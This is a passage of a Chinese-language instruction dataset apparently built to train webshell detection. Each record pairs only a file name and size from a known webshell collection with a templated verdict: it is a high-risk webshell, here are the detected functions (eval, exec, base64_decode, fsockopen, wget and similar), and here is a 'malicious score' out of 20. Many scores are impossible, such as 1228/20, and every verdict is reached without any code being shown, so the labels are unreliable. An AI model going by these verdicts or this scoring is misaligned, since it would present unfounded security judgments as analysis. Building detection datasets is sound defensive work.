\"行数\": 294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form, CreateObject( 恶意度评分: 84/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/redirect.asp", "malicious_score": 84, "md5_hash": "97da83c6e3efbba98df270cc70beb8f8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"183 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w02.jsp", "malicious_score": 6, "md5_hash": "71b664c7e5e1b3296c9499a16c921e93"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp修改.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8304 bytes\", \"行数\": 318}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/菜刀jsp修改.jsp", "malicious_score": 32, "md5_hash": "a30fc57ffcbce80614c36f73e3ceecdb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w02.php\", \"文件类型\": \"php\", \"文件大小\": \"287 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, preg_replace(\"/[Database]/e, eval(, $_POST[, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: file_put_contents 恶意度评分: 24/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w02.php", "malicious_score": 24, "md5_hash": "5d8447e68647578c7c15bbca1ab9682d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"guest.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"9623 bytes\", \"行数\": 263}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/guest.jsp", "malicious_score": 26, "md5_hash": "b26f1c47d7c70c1608a88454bda3834a"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hkmjj.asp\", \"文件类型\": \"asp\", \"文件大小\": \"653 bytes\", \"行数\": 22}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.write, execute ( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/hkmjj.asp", "malicious_score": 8, "md5_hash": "8fadd9f56866840fb750d1e9acb5ee14"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ice.php\", \"文件类型\": \"php\", \"文件大小\": \"32 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/ice.php", "malicious_score": 6, "md5_hash": "1d6335247f58e0a5b03e17977888f5f2"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspbd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2359 bytes\", \"行数\": 87}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/jspbd.jsp", "malicious_score": 12, "md5_hash": "7d5e9732766cf5b8edca9b7ae2b6028f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspWebshell 1.2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"26075 bytes\", \"行数\": 788}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/JspWebshell 1.2.jsp", "malicious_score": 86, "md5_hash": "3ad8871c7e0af131bfb6d354bf229a82"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"68110 bytes\", \"行数\": 1802}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 172/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/browser.jsp", "malicious_score": 172, "md5_hash": "37603e44ee6dc1c359feb68a0d566f76"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1870 bytes\", \"行数\": 77}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/list.jsp", "malicious_score": 6, "md5_hash": "1ea290ff4259dcaeb680cec992738eda"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd_win32.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"823 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/cmd_win32.jsp", "malicious_score": 15, "md5_hash": "cc4d4d6cc9a25984aa9a7583c7def174"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspShell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"13250 bytes\", \"行数\": 352}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/jspShell.jsp", "malicious_score": 21, "md5_hash": "0d5b5a17552254be6c1c8f1eb3a5fdc1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"829 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/JSP/cmd.jsp", "malicious_score": 15, "md5_hash": "5391c4a8af1ede757ba9d28865e75853"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"co.php\", \"文件类型\": \"php\", \"文件大小\": \"61563 bytes\", \"行数\": 1503}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/co.php", "malicious_score": 13, "md5_hash": "62199f5ac721a0cb9b28f465a513874c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57.1.4.0.php\", \"文件类型\": \"php\", \"文件大小\": \"53064 bytes\", \"行数\": 23}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/r57.1.4.0.php", "malicious_score": 13, "md5_hash": "574f3303e131242568b0caf3de42f325"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aZRaiLPhp v1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"10421 bytes\", \"行数\": 284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fwrite( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/aZRaiLPhp v1.0.php", "malicious_score": 17, "md5_hash": "209eabe5bace5398ae84d86e31e1a94b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimShell 1.0 - Simorgh Security MGZ.php\", \"文件类型\": \"php\", \"文件大小\": \"5164 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/SimShell 1.0 - Simorgh Security MGZ.php", "malicious_score": 48, "md5_hash": "37cb1db26b1b0161a4bf678a6b4565bd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.php\", \"文件类型\": \"php\", \"文件大小\": \"557 bytes\", \"行数\": 33}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 具备文件操作能力: fopen\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/list.php", "malicious_score": 7, "md5_hash": "922b128ddd90e1dc2f73088956c548ed"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hkrkoz.php\", \"文件类型\": \"php\", \"文件大小\": \"44915 bytes\", \"行数\": 1522}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 215/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/hkrkoz.php", "malicious_score": 215, "md5_hash": "802f5cae46d394b297482fd0c27cb2fc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Backdoor.PHP.Agent.php\", \"文件类型\": \"php\", \"文件大小\": \"103564 bytes\", \"行数\": 2226}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1210/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Backdoor.PHP.Agent.php", "malicious_score": 1210, "md5_hash": "6fcc283470465eed4870bcc3e2d7f14d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99.php\", \"文件类型\": \"php\", \"文件大小\": \"150555 bytes\", \"行数\": 2887}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_COOKIE[, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99.php", "malicious_score": 176, "md5_hash": "4a60c65031613b89a05e8c2708f4a442"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Cyber Shell (v 1.0).php\", \"文件类型\": \"php\", \"文件大小\": \"34705 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, exec(, system( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Cyber Shell (v 1.0).php", "malicious_score": 145, "md5_hash": "07dda1427bd325604f1ad364eb2141bc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Private-i3lue.php\", \"文件类型\": \"php\", \"文件大小\": \"62716 bytes\", \"行数\": 1456}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Private-i3lue.php", "malicious_score": 279, "md5_hash": "74f5ddaa8ce6df24f662f07bef4b0bd2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Sst-Sheller.php\", \"文件类型\": \"php\", \"文件大小\": \"21397 bytes\", \"行数\": 907}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, system(, $_POST[ 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Sst-Sheller.php", "malicious_score": 124, "md5_hash": "d93c62a0a042252f7531d8632511ca56"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php\", \"文件类型\": \"php\", \"文件大小\": \"5306 bytes\", \"行数\": 89}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php", "malicious_score": 15, "md5_hash": "49ad9117c96419c35987aaa7e2230f63"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"s72 Shell v1.1 Coding.php\", \"文件类型\": \"php\", \"文件大小\": \"5121 bytes\", \"行数\": 141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/s72 Shell v1.1 Coding.php", "malicious_score": 7, "md5_hash": "9136a2b2603d1f2a3daeba521537ae05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"KAdot Universal Shell v0.1.6.php\", \"文件类型\": \"php\", \"文件大小\": \"4656 bytes\", \"行数\": 229}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, fputs(, eval(, passthru( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: copy\\s*\\( 恶意度评分: 82/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.php", "malicious_score": 82, "md5_hash": "3529a116017ece53288e66e96e6a4892"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"redcod.php\", \"文件类型\": \"php\", \"文件大小\": \"70620 bytes\", \"行数\": 1724}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/redcod.php", "malicious_score": 13, "md5_hash": "5c1c8120d82f46ff9d813fbe3354bac5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"150.php\", \"文件类型\": \"php\", \"文件大小\": \"65652 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/150.php", "malicious_score": 13, "md5_hash": "400c4b0bed5c90f048398e1d268ce4dc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99shell.php\", \"文件类型\": \"php\", \"文件大小\": \"159167 bytes\", \"行数\": 3076}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 260/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99shell.php", "malicious_score": 260, "md5_hash": "ea512d2141cee9471fb02e22b2e16074"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php\", \"文件类型\": \"php\", \"文件大小\": \"53629 bytes\", \"行数\": 1480}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 458/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php", "malicious_score": 458, "md5_hash": "050dbb26dd94b20a76148ae3ec727bb2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cpg_143_incl_xpl.php\", \"文件类型\": \"php\", \"文件大小\": \"17659 bytes\", \"行数\": 419}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/cpg_143_incl_xpl.php", "malicious_score": 37, "md5_hash": "5937b131b67d8e0afdbd589251a5e176"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"newsh.php\", \"文件类型\": \"php\", \"文件大小\": \"56072 bytes\", \"行数\": 1223}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 555/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/newsh.php", "malicious_score": 555, "md5_hash": "0d2c2c151ed839e6bafc7aa9c69be715"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99-shadows-mod.php\", \"文件类型\": \"php\", \"文件大小\": \"160181 bytes\", \"行数\": 3072}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 261/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99-shadows-mod.php", "malicious_score": 261, "md5_hash": "68c0629d08b1664f5bcce7d7f5f71d22"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57.php\", \"文件类型\": \"php\", \"文件大小\": \"98732 bytes\", \"行数\": 2115}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1228/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/r57.php", "malicious_score": 1228, "md5_hash": "41af6fd253648885c7ad2ed524e0692d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"itsecteam_shell.php\", \"文件类型\": \"php\", \"文件大小\": \"65120 bytes\", \"行数\": 1284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_POST[ 发现混淆技术: base64_decode, pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/itsecteam_shell.php", "malicious_score": 824, "md5_hash": "bd6d3b2763c705a01cc2b3f105a25fa4"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso2.php\", \"文件类型\": \"php\", \"文件大小\": \"50779 bytes\", \"行数\": 1238}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 598/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/wso2.php", "malicious_score": 598, "md5_hash": "cbc44fb78220958f81b739b493024688"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPSPY.php\", \"文件类型\": \"php\", \"文件大小\": \"27213 bytes\", \"行数\": 810}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, $_POST[, exec( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 141/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/PHPSPY.php", "malicious_score": 141, "md5_hash": "5336ab750908fc3ad6d78bd62887842d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php\", \"文件类型\": \"php\", \"文件大小\": \"11627 bytes\", \"行数\": 378}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, $_GET[, $_POST[, exec(, passthru( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php", "malicious_score": 77, "md5_hash": "089ff24d978aeff2b4b2869f0c7d38a3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99v2.php\", \"文件类型\": \"php\", \"文件大小\": \"150555 bytes\", \"行数\": 2887}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_COOKIE[, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99v2.php", "malicious_score": 176, "md5_hash": "4a60c65031613b89a05e8c2708f4a442"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php\", \"文件类型\": \"php\", \"文件大小\": \"1340 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, shell_exec(, exec( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php", "malicious_score": 30, "md5_hash": "3a0dbc33983777249db6cfe584618f12"}} 